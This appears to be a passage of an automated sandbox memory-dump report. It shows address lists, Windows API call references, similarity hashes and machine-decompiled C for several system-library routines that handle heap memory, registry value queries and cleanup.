0x6abd7a1a
0x00000000
0x6abd7a1a
0x6abd7b9e
0x6abd7b9f
0x6abd7ba3
0x6abd7bb1
0x6abd7bb1
0x6abd7bb6
0x00000000
0x6abd7bb6
0x6abd7b68
0x6abd7ae2
0x6abd7ae2
0x00000000
0x6abd7ae2
0x6abd7b6e
0x6abd7b75
0x6abd7b81
0x6abd7b87
0x00000000
0x00000000
0x6abd7b31
0x6abd7b34
0x6abd7b3c
0x6abd7b46
0x6abd7b57
0x6abd7b59
0x6abd7b59
0x00000000
0x6abd7b59
0x6abd7b77
0x00000000
0x6abd7b77
0x6abd7b2a
0x00000000
0x6abd7b2a
0x6abd7af3
0x6abd7be0
0x6abd7be0
0x00000000
0x6abd7be0
0x6abd7afb
0x6abd7afe
0x00000000
0x6abd7b05
0x6abd7b05
0x6abd7b09
0x6abd7b0f
0x00000000
0x00000000
0x6abd7b18
0x6abd7b1d
0x00000000
0x6abd7b1d
0x6abd7afe
0x6abd7ab9
0x00000000
0x00000000
0x6abd7ac1
0x00000000
0x6abd7ac8
0x6abd7ac8
0x6abd7acc
0x6abd7ad2
0x00000000
0x00000000
0x6abd7adb
0x00000000
0x6abd7adb
0x6abd7ac1
0x6abd7aa1
0x6abd79d6
0x6abd79dc
0x6abd7a91
0x6abd7a94
0x00000000
0x6abd7a94
0x6abd79e2
0x00000000
0x6abd79e2
0x6abd7a7a
0x00000000
0x00000000
0x6abd7a8a
0x6abd7a21
0x6abd7a21
0x00000000
0x6abd7a21
0x6ab6c650
0x6ab6c651
0x6ab6c656
0x6ab6c65c
0x6ab6c65d
0x6ab6c663
0x6ab6c664
0x6ab6c66a
0x6ab6c66e
0x6abd79c7
0x00000000
0x6abd79c7
0x6ab6c67a
0x00000000
0x00000000
0x00000000

APIs

RtlInitUnicodeStringEx.1105(?,?,?,00000000,00800000), ref: 6AB6C639
ZwQueryValueKey.1105(00000000,?,00000002,?,00000400,?,?,?,?,00000000,00800000), ref: 6AB6C665
RtlFreeHeap.1105(?,00000000,00000002,00000000,?,00000002,00000000,00000038,?,00000000,00800000), ref: 6ABD7A15
RtlAllocateHeap.1105(?,?,00000038,?,?,?,00000000,00800000), ref: 6ABD7A43
ZwQueryValueKey.1105(00000000,?,00000002,00000000,00000038,?,00000000,00800000), ref: 6ABD7A65
RtlFreeHeap.1105(?,00000000,00000000,00000000,?,00000002,00000000,00000038,?,00000000,00800000), ref: 6ABD7A8A
RtlUnicodeStringToInteger.1105(00000000,00000000,00000000,00000000,?,00000002,00000000,00000038,?,00000000,00800000), ref: 6ABD7B52
memcpy.1105(00000000,0000000C,?,00000000,?,00000002,00000000,00000038,?,00000000,00800000), ref: 6ABD7BB1

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$FreeQueryStringUnicodeValue$AllocateInitIntegermemcpy
String ID:
API String ID: 3015855070-0
Opcode ID: 147e4be291034f2c93a4aa99de66862ae8a0e9b1c2be90fb7dd411725edd35a8
Instruction ID: 8d7e0ab38957339d4376efd42181763fe9e02debe2412d3ab85cede44d2854c7
Opcode Fuzzy Hash: 147e4be291034f2c93a4aa99de66862ae8a0e9b1c2be90fb7dd411725edd35a8
Instruction Fuzzy Hash: 7881E2766492C1AFDB11DE18C890BAB73E4FF84354F15486EED548B220DB71DD80EBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6AB65050, Relevance: 12.1, APIs: 8, Instructions: 133
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E6AB65050(intOrPtr _a4) {
				char _v20;
				void* _v24;
				long _v26;
				void* _v28;
				void* _v40;
				void* _v42;
				void* _v44;
				void* _v48;
				void* _v56;
				void* _v64;
				intOrPtr _t34;
				void* _t36;
				void* _t38;
				signed short _t41;
				signed int _t51;
				void* _t58;
				void* _t60;
				void* _t69;
				intOrPtr _t74;
				long _t78;
				void* _t79;
				void* _t80;
				void* _t81;
				signed int _t82;
				void* _t84;

				_t84 = (_t82 & 0xfffffff8) - 0x1c;
				_t34 =  *[fs:0x30];
				_t58 =  *(_t34 + 0x18);
				_t74 =  *((intOrPtr*)(_t34 + 0x10));
				_v28 = _t58;
				if(E6AB6519E(_a4) != 0) {
					_t36 = 0;
					L14:
					return _t36;
				}
				if(E6AB874C0(_a4) != 0) {
					_t36 = 0xc0000103;
				} else {
					_t78 =  *(_t74 + 0x26) & 0x0000ffff;
					while(1) {
						_t38 = RtlAllocateHeap(_t58, 0, _t78);
						_v24 = _t38;
						if(_t38 == 0) {
							break;
						}
						_v28 = 0;
						if(_t78 > 0xffff) {
							_v26 = 0xffff;
							L25:
							_t79 = 0xc0000095;
							L26:
							RtlFreeHeap(_t58, 0, _t38);
							_t36 = _t79;
							goto L14;
						}
						_v26 = _t78;
						_t80 = E6AB86E30(_a4, _t78, _t38, 0, 0,  &_v20);
						if(_t80 == 0) {
							_t79 = 0xc0000033;
							L23:
							_t38 = _v24;
							goto L26;
						}
						_t41 = _v26;
						if(_t80 > (_t41 & 0x0000ffff) - 4) {
							__eflags =  *((char*)( *[fs:0x30] + 3));
							if(__eflags >= 0) {
								_t41 = _v26;
								goto L7;
							}
							RtlFreeHeap(_t58, 0, _v24);
							_t78 = _t80 + 4;
							continue;
						}
						L7:
						_t72 = _t41 & 0x0000ffff;
						if(_t80 > (_t41 & 0x0000ffff)) {
							_t79 = 0xc0000106;
							goto L23;
						}
						_t92 = _t80 - 0xffff;
						if(_t80 > 0xffff) {
							_v28 = 0xffff;
							_t38 = _v24;
							goto L25;
						}
						_v28 = _t80;
						_t60 = E6AB9F0BF( &_v28, _t72, _t92, _t84 + 0x14);
						RtlFreeHeap(_v40, 0, _v28);
						if(_t60 >= 0) {
							L6AB7EEF0(0x6ac579a0);
							_t69 = _v44;
							_t81 =  *0x6ac58210;
							 *((intOrPtr*)(_t74 + 0x2c)) =  *((intOrPtr*)(_t69 + 4));
							 *((intOrPtr*)(_t74 + 0x28)) =  *((intOrPtr*)(_t69 + 0x10));
							 *((short*)(_t74 + 0x24)) =  *((intOrPtr*)(_t69 + 0xc));
							 *0x6ac58210 = _t69;
							_t51 = E6AB7EB70(_t69, 0x6ac579a0);
							if(_t81 != 0) {
								asm("lock xadd [esi], eax");
								if((_t51 | 0xffffffff) == 0) {
									_push( *((intOrPtr*)(_t81 + 4)));
									E6ABA95D0();
									RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _t81);
								}
							}
						}
						_t36 = _t60;
						goto L14;
					}
					_t36 = 0xc0000017;
				}
			}

0x6ab65058
0x6ab6505b
0x6ab65066
0x6ab6506a
0x6ab6506d
0x6ab65078
0x6ab6519a
0x6ab65191
0x6ab65197
0x6ab65197
0x6ab65088
0x6abc0c21
0x6ab6508e
0x6ab6508e
0x6ab65092
0x6ab65096
0x6ab6509b
0x6ab650a1
0x00000000
0x00000000
0x6ab650ae
0x6ab650b5
0x6abc0c72
0x6abc0c77
0x6abc0c77
0x6abc0c7c
0x6abc0c80
0x6abc0c85
0x00000000
0x6abc0c85
0x6ab650bf
0x6ab650d4
0x6ab650d8
0x6abc0c67
0x6abc0c6c
0x6abc0c6c
0x00000000
0x6abc0c6c
0x6ab650de
0x6ab650eb
0x6abc0c31
0x6abc0c35
0x6abc0c4b
0x00000000
0x6abc0c4b
0x6abc0c3e
0x6abc0c43
0x00000000
0x6abc0c43
0x6ab650f1
0x6ab650f1
0x6ab650f6
0x6abc0c55
0x00000000
0x6abc0c55
0x6ab65101
0x6ab65103
0x6abc0c5c
0x6abc0c61
0x00000000
0x6abc0c61
0x6ab6510d
0x6ab65120
0x6ab65128
0x6ab6512f
0x6ab65136
0x6ab6513b
0x6ab6513f
0x6ab6514d
0x6ab65153
0x6ab6515a
0x6ab6515e
0x6ab65164
0x6ab6516b
0x6ab65170
0x6ab65174
0x6ab65176
0x6ab65179
0x6ab6518a
0x6ab6518a
0x6ab65174
0x6ab6516b
0x6ab6518f
0x00000000
0x6ab6518f
0x6abc0c8c
0x6abc0c8c

APIs

RtlAllocateHeap.1105(?,00000000,?), ref: 6AB65096
RtlFreeHeap.1105(?,00000000,00000000,00000000,?), ref: 6ABC0C80

Part of subcall function 6AB86E30: memset.1105(01000000,00000000,?,?,00000024,00000000,?), ref: 6AB86F17

RtlFreeHeap.1105(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,-00000004,00000000,00000000,00000000,00000000,00000000,?), ref: 6AB65128
RtlEnterCriticalSection.1105(6AC579A0,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,-00000004,00000000,00000000,00000000,00000000,00000000,?), ref: 6AB65136
RtlLeaveCriticalSection.1105(6AC579A0,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,-00000004,00000000,00000000,00000000,00000000,00000000,?), ref: 6AB65164
ZwClose.1105(?,6AC579A0,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,-00000004,00000000,00000000,00000000,00000000,00000000), ref: 6AB65179
RtlFreeHeap.1105(?,00000000,?,?,6AC579A0,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,-00000004,00000000,00000000), ref: 6AB6518A
RtlFreeHeap.1105(?,00000000,00000000,00000000,00000000,00000000,?,00000000,?), ref: 6ABC0C3E

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Free$CriticalSection$AllocateCloseEnterLeavememset
String ID:
API String ID: 1968905909-0
Opcode ID: 1c0aaa4e83fbfb39e1079b0f364f8aa36ba9b79579fdcf20f7b4a292ec2fc80a
Instruction ID: c6e1e6ffb1f5ae2f0a62241ad5f6a491ed3f9918b70ff3afbfbe94ffa0ee2dfe
Opcode Fuzzy Hash: 1c0aaa4e83fbfb39e1079b0f364f8aa36ba9b79579fdcf20f7b4a292ec2fc80a
Instruction Fuzzy Hash: 5841F475609382ABD320DF28C840F6BB7A4EF44714F020A29F9569B242EF70DC51E7DA

Uniqueness

Uniqueness Score: -1.00%

Function 6AB9513A, Relevance: 10.8, APIs: 7, Instructions: 258
timeCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E6AB9513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _v24;
				int _v28;
				int* _v32;
				signed int _v36;
				int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				void* _t165;
				signed int _t172;
				signed int _t181;
				void* _t185;
				void* _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				intOrPtr _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr _t230;
				void** _t233;
				signed int _t234;
				signed int _t235;
				intOrPtr _t238;
				intOrPtr _t239;
				intOrPtr _t241;
				void* _t246;
				signed int _t247;
				signed int _t248;
				void* _t249;
				void* _t252;
				void* _t253;
				signed int _t254;
				signed int _t256;
				signed int _t257;

				_t256 = (_t254 & 0xfffffff8) - 0x6c;
				_v8 =  *0x6ac5d360 ^ _t256;
				_v32 = _v32 & 0x00000000;
				_t252 = __edx;
				_t238 = __ecx;
				_t212 = 6;
				_t246 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t246, 0, _t212 << 2);
				_t257 = _t256 + 0xc;
				_t247 = _t246 + _t212;
				if(_t207 == 2) {
					_t248 =  *(_t238 + 0x60);
					_t208 =  *(_t238 + 0x64);
					_v63 =  *((intOrPtr*)(_t238 + 0x4c));
					_t159 =  *((intOrPtr*)(_t238 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t238 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t248;
					L8:
					_t214 = 0;
					if( *(_t238 + 0x74) > 0) {
						_t82 = _t238 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = 1 + _t214;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t238 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t238 +  *((intOrPtr*)(_v88 + _t238 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t238 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t238 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t241 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t252 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t241 + 0x4e) & 0x7fff)) {
								_t181 = E6ABAD0F0(1, _t226 + 0x20, 0);
								_t230 = _v40;
								 *(_t230 + 8) = _t181;
								 *((intOrPtr*)(_t230 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t250 = _t127;
								E6AB82280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *(_t210 + 0x94);
								if(_t185 != 0) {
									RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _t185);
								}
								_t189 = RtlAllocateHeap( *( *[fs:0x30] + 0x18), 8, _v20 + 0x10);
								 *(_t210 + 0x94) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v28;
									( *(_t210 + 0x94))[3] = _v24;
									_t233 =  *(_t210 + 0x94);
									 *_t233 =  &(_t233[4]);
									_t233[1] = _t233[1] & 0x00000000;
									memcpy( *( *(_t210 + 0x94)), _v36, _v28);
									_t257 = _t257 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E6AB7FFB0(_t210, _t250, _t250);
								_t222 = _v84;
								_t172 = _v88;
								_t208 = _v92;
								_t248 = _v96;
								L10:
								_t239 =  *((intOrPtr*)(_t252 + 0x1c));
								_v44 = _t239;
								if(_t239 != 0) {
									 *0x6ac5b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t248, _t208, _v32,  *((intOrPtr*)(_t252 + 0x20)));
									_v44();
								}
								_pop(_t249);
								_pop(_t253);
								_pop(_t209);
								return E6ABAB640(0, _t209, _v8 ^ _t257, _t239, _t249, _t253);
							}
							_t181 = _v92;
							L31:
							_t226 = 1 + _t226;
							_t181 = _t181 + 0x18;
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t248 = _t247 | 0xffffffff;
				_t208 = _t248;
				_v84 = _t248;
				_v80 = _t208;
				if( *((intOrPtr*)(_t252 + 0x4c)) == _t157) {
					_t234 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t252 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t252 + 0x40);
					_t234 = _v72 |  *(_t252 + 0x44);
					_t248 =  *(_t252 + 0x38);
					_t208 =  *(_t252 + 0x3c);
					_v76 = _t202;
					_v72 = _t234;
					_v84 = _t248;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t234;
				if( *((char*)(_t252 + 0xc4)) != 0) {
					_t238 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t252 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t252 + 0xc5));
						_t238 = _v48;
					}
					_t203 = _t202 |  *(_t252 + 0xb8);
					_t235 = _t234 |  *(_t252 + 0xbc);
					_t248 = _t248 &  *(_t252 + 0xb0);
					_t208 = _t208 &  *(_t252 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t235;
					_v72 = _t235;
					_v84 = _t248;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t248 = 0;
					 *(_t238 + 0x74) =  *(_t238 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}

0x6ab95142
0x6ab9514c
0x6ab95150
0x6ab95157
0x6ab95159
0x6ab9515e
0x6ab95165
0x6ab95169
0x6ab9516c
0x6ab95172
0x6ab95176
0x6ab9517a
0x6ab9517a
0x6ab9517a
0x6ab9517f
0x6abd6d8b
0x6abd6d8e
0x6abd6d91
0x6abd6d95
0x6abd6d98
0x6abd6d9c
0x6abd6da0
0x6abd6da3
0x6abd6da7
0x6abd6e26
0x6abd6e26
0x6abd6e2a
0x6ab951f9
0x6ab951f9
0x6ab951fe
0x6abd6e33
0x6abd6e33
0x6abd6e39
0x6abd6e3d
0x6abd6e46
0x6abd6e50
0x00000000
0x00000000
0x6abd6e52
0x6abd6e53
0x6abd6e56
0x6abd6e5d
0x00000000
0x00000000
0x00000000
0x6abd6e5f
0x6abd6e67
0x6abd6e77
0x6abd6e7f
0x6abd6e80
0x6abd6e88
0x6abd6e90
0x6abd6e9f
0x6abd6ea5
0x6abd6ea9
0x6abd6eb1
0x6abd6ebf
0x00000000
0x00000000
0x6abd6ecf
0x6abd6ed3
0x00000000
0x00000000
0x6abd6edb
0x6abd6ede
0x6abd6ee1
0x6abd6ee8
0x6abd6eeb
0x6abd6eed
0x6abd6ef0
0x6abd6ef4
0x6abd6ef8
0x6abd6efc
0x00000000
0x00000000
0x6abd6f0d
0x6abd6f11
0x6abd6f32
0x6abd6f37
0x6abd6f3b
0x6abd6f3e
0x6abd6f41
0x6abd6f46
0x00000000
0x00000000
0x6abd6f4c
0x6abd6f50
0x6abd6f50
0x6abd6f54
0x6abd6f62
0x6abd6f65
0x6abd6f6d
0x6abd6f7b
0x6abd6f7b
0x6abd6f93
0x6abd6f98
0x6abd6fa0
0x6abd6fa6
0x6abd6fb3
0x6abd6fb6
0x6abd6fbf
0x6abd6fc1
0x6abd6fd5
0x6abd6fda
0x6abd6fda
0x6abd6fdd
0x6abd6fe2
0x6abd6fe7
0x6abd6feb
0x6abd6fef
0x6abd6ff3
0x6ab9520c
0x6ab9520c
0x6ab9520f
0x6ab95215
0x6ab95234
0x6ab9523a
0x6ab9523a
0x6ab95244
0x6ab95245
0x6ab95246
0x6ab95251
0x6ab95251
0x6abd6f13
0x6abd6f17
0x6abd6f17
0x6abd6f18
0x6abd6f1b
0x6abd6f1f
0x6abd6f23
0x00000000
0x6abd6f28
0x6ab95204
0x6ab95204
0x6ab95208
0x00000000
0x6ab95208
0x6ab95185
0x6ab95188
0x6ab9518a
0x6ab9518e
0x6ab95195
0x6abd6db1
0x6abd6db5
0x6abd6db9
0x6ab9519b
0x6ab9519b
0x6ab9519e
0x6ab951a7
0x6ab951a9
0x6ab951a9
0x6ab951b5
0x6ab951b8
0x6ab951bb
0x6ab951be
0x6ab951c1
0x6ab951c5
0x6ab951c9
0x6ab951cd
0x6ab951cd
0x6ab951d8
0x6ab951dc
0x6ab951e0
0x6abd6dcc
0x6abd6dd0
0x6abd6dd5
0x6abd6ddd
0x6abd6de1
0x6abd6de1
0x6abd6de5
0x6abd6deb
0x6abd6df1
0x6abd6df7
0x6abd6dfd
0x6abd6e01
0x6abd6e05
0x6abd6e09
0x6abd6e0d
0x6abd6e11
0x6abd6e11
0x6ab951eb
0x6abd6e1a
0x6abd6e1f
0x6abd6e21
0x6abd6e23
0x00000000
0x6ab951f1
0x6ab951f1
0x00000000
0x6ab951f1

APIs

RtlDebugPrintTimes.1105(?,?,?,?,?,00000000,?,?,00000000,?,000000A0,?), ref: 6AB95234

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: c9b599b73bbe318ae567467e6a0e79083101598f47ca904ee8121122efd92210
Instruction ID: 562654345c9b4ce926501ee4cd50289431adfdfad06f42de31b2f036d6453deb
Opcode Fuzzy Hash: c9b599b73bbe318ae567467e6a0e79083101598f47ca904ee8121122efd92210
Instruction Fuzzy Hash: 7FC11FB55093809FD354CF28C490A5ABBF1FF89308F144A6EF8998B362DB71E845DB52

Uniqueness

Uniqueness Score: -1.00%

Function 6AB6E8B0, Relevance: 10.7, APIs: 7, Instructions: 190
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6AB6E8B0(void* __ecx, signed int* _a4, signed int _a8) {
				signed int _t97;
				signed int _t98;
				signed int _t99;
				signed int _t100;
				signed int _t101;
				signed int _t123;
				long _t131;
				signed int* _t134;

				_t134 = _a4;
				_t131 = 0;
				if(_t134 == 0) {
					L70:
					_t131 = 0xc000000d;
					L15:
					return _t131;
				}
				_t123 = _a8;
				if(_t123 == 0) {
					goto L70;
				}
				if((_t123 & 0x00000400) != 0) {
					_t123 = 0xfff;
				}
				if((_t123 & 0x00000001) != 0) {
					if(_t134[5] != _t131) {
						if(( *_t134 & 0x00000001) != 0) {
							RtlFreeHeap( *( *[fs:0x30] + 0x18), _t131, _t134[5]);
						}
						_t134[5] = _t131;
					}
					 *_t134 =  *_t134 & 0xfffffffe;
				}
				if((_t123 & 0x00000002) != 0) {
					if(_t134[6] != _t131) {
						if(( *_t134 & 0x00000002) != 0) {
							RtlFreeHeap( *( *[fs:0x30] + 0x18), _t131, _t134[6]);
						}
						_t134[6] = _t131;
					}
					 *_t134 =  *_t134 & 0xfffffffd;
				}
				if((_t123 & 0x00000004) != 0) {
					if(_t134[7] != _t131) {
						if(( *_t134 & 0x00000004) != 0) {
							RtlFreeHeap( *( *[fs:0x30] + 0x18), _t131, _t134[7]);
						}
						_t134[7] = _t131;
					}
					 *_t134 =  *_t134 & 0xfffffffb;
				}
				if((_t123 & 0x00000008) != 0) {
					if(_t134[8] != _t131) {
						if(( *_t134 & 0x00000008) != 0) {
							RtlFreeHeap( *( *[fs:0x30] + 0x18), _t131, _t134[8]);
						}
						_t134[8] = _t131;
					}
					 *_t134 =  *_t134 & 0xfffffff7;
				}
				if((_t123 & 0x00000010) != 0) {
					_t97 = _t134[9];
					if(_t97 != 0) {
						if(( *_t134 & 0x00000010) != 0) {
							 *(_t97 + 0x20) =  *(_t97 + 0x20) & 0xffffffbf;
							E6AB776E2(_t134[9]);
						}
						_t134[9] = _t131;
					}
					 *_t134 =  *_t134 & 0xffffffef;
				}
				if((_t123 & 0x00000020) != 0) {
					_t98 = _t134[0xa];
					if(_t98 != 0) {
						if(( *_t134 & 0x00000020) != 0) {
							 *(_t98 + 0x20) =  *(_t98 + 0x20) & 0xffffffbf;
							E6AB776E2(_t134[0xa]);
						}
						_t134[0xa] = _t131;
					}
					 *_t134 =  *_t134 & 0xffffffdf;
				}
				if((_t123 & 0x00000040) != 0) {
					_t99 = _t134[0xd];
					if(_t99 != 0) {
						if(( *_t134 & 0x00000040) != 0) {
							 *(_t99 + 0x20) =  *(_t99 + 0x20) & 0xffffffbf;
							E6AB776E2(_t134[0xd]);
						}
						_t134[0xd] = _t131;
					}
					 *_t134 =  *_t134 & 0xffffffbf;
				}
				if(_t123 < 0) {
					_t100 = _t134[0xc];
					if(_t100 != 0) {
						if(( *_t134 & 0x00000080) != 0) {
							 *(_t100 + 0x20) =  *(_t100 + 0x20) & 0xffffffbf;
							E6AB776E2(_t134[0xc]);
						}
						_t134[0xc] = _t131;
					}
					 *_t134 =  *_t134 & 0xffffff7f;
				}
				_t125 = 0x200;
				if((0x00000200 & _t123) != 0) {
					_t101 = _t134[0xe];
					if(_t101 != 0) {
						if(( *_t134 & 0x00000200) != 0) {
							 *(_t101 + 0x20) =  *(_t101 + 0x20) & 0xffffffbf;
							_t125 = _t134[0xe];
							E6AB776E2(_t134[0xe]);
						}
						_t134[0xe] = _t131;
					}
					 *_t134 =  *_t134 & 0xfffffdff;
				}
				if((0x00000800 & _t123) != 0) {
					if(_t134[0x14] != _t131) {
						if(( *_t134 & 0x00000800) != 0) {
							RtlFreeHeap( *( *[fs:0x30] + 0x18), _t131, _t134[0x14]);
						}
						_t134[0x14] = _t131;
					}
					 *_t134 =  *_t134 & 0xfffff7ff;
				}
				if((_t123 & 0x00000fff) != 0 && _t134[0xf] != _t131) {
					E6AB6E8B0(_t125, _t134[0xf], _t123);
					if(_t134[0xf] != _t131) {
						RtlFreeHeap( *( *[fs:0x30] + 0x18), _t131, _t134[0xf]);
					}
					_t134[0xf] = _t131;
				}
			}

0x6ab6e8bb
0x6ab6e8bf
0x6ab6e8c3
0x6abc57a2
0x6abc57a2
0x6ab6e942
0x6ab6e94a
0x6ab6e94a
0x6ab6e8c9
0x6ab6e8ce
0x00000000
0x00000000
0x6ab6e8da
0x6abc564f
0x6abc564f
0x6ab6e8e3
0x6ab6e98f
0x6abc565c
0x6abc566b
0x6abc566b
0x6abc5670
0x6abc5670
0x6ab6e995
0x6ab6e995
0x6ab6e8ec
0x6ab6e9a0
0x6abc567b
0x6abc568a
0x6abc568a
0x6abc568f
0x6abc568f
0x6ab6e9a6
0x6ab6e9a6
0x6ab6e8f5
0x6ab6e950
0x6abc569a
0x6abc56a9
0x6abc56a9
0x6abc56ae
0x6abc56ae
0x6ab6e956
0x6ab6e956
0x6ab6e8fa
0x6ab6e95e
0x6abc56b9
0x6abc56c8
0x6abc56c8
0x6abc56cd
0x6abc56cd
0x6ab6e964
0x6ab6e964
0x6ab6e8ff
0x6ab6e969
0x6ab6e96e
0x6abc56d8
0x6abc56da
0x6abc56e1
0x6abc56e1
0x6abc56e6
0x6abc56e6
0x6ab6e974
0x6ab6e974
0x6ab6e904
0x6ab6e979
0x6ab6e97e
0x6abc56f1
0x6abc56f3
0x6abc56fa
0x6abc56fa
0x6abc56ff
0x6abc56ff
0x6ab6e984
0x6ab6e984
0x6ab6e909
0x6ab6e9ae
0x6ab6e9b3
0x6abc570a
0x6abc570c
0x6abc5713
0x6abc5713
0x6abc5718
0x6abc5718
0x6ab6e9b9
0x6ab6e9b9
0x6ab6e911
0x6ab6e9c1
0x6ab6e9c6
0x6abc5723
0x6abc5725
0x6abc572c
0x6abc572c
0x6abc5731
0x6abc5731
0x6ab6e9cc
0x6ab6e9cc
0x6ab6e917
0x6ab6e91e
0x6ab6e9d7
0x6ab6e9dc
0x6abc573b
0x6abc573d
0x6abc5741
0x6abc5744
0x6abc5744
0x6abc5749
0x6abc5749
0x6ab6e9e2
0x6ab6e9e2
0x6ab6e92b
0x6abc5754
0x6abc5758
0x6abc5767
0x6abc5767
0x6abc576c
0x6abc576c
0x6abc576f
0x6abc576f
0x6ab6e937
0x6abc577e
0x6abc5786
0x6abc5795
0x6abc5795
0x6abc579a
0x6abc579a

APIs

RtlFreeHeap.1105(?,00000000,?,6AC566C0,?,6AC584D8,?,?,6AB6E887,?,00000010,00000000,6AC58638), ref: 6ABC568A
RtlFreeHeap.1105(?,00000000,00000000,6AC566C0,?,6AC584D8,?,?,6AB6E887,?,00000010,00000000,6AC58638), ref: 6ABC56A9
RtlFreeHeap.1105(?,00000000,00000004,6AC566C0,?,6AC584D8,?,?,6AB6E887,?,00000010,00000000,6AC58638), ref: 6ABC56C8

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap
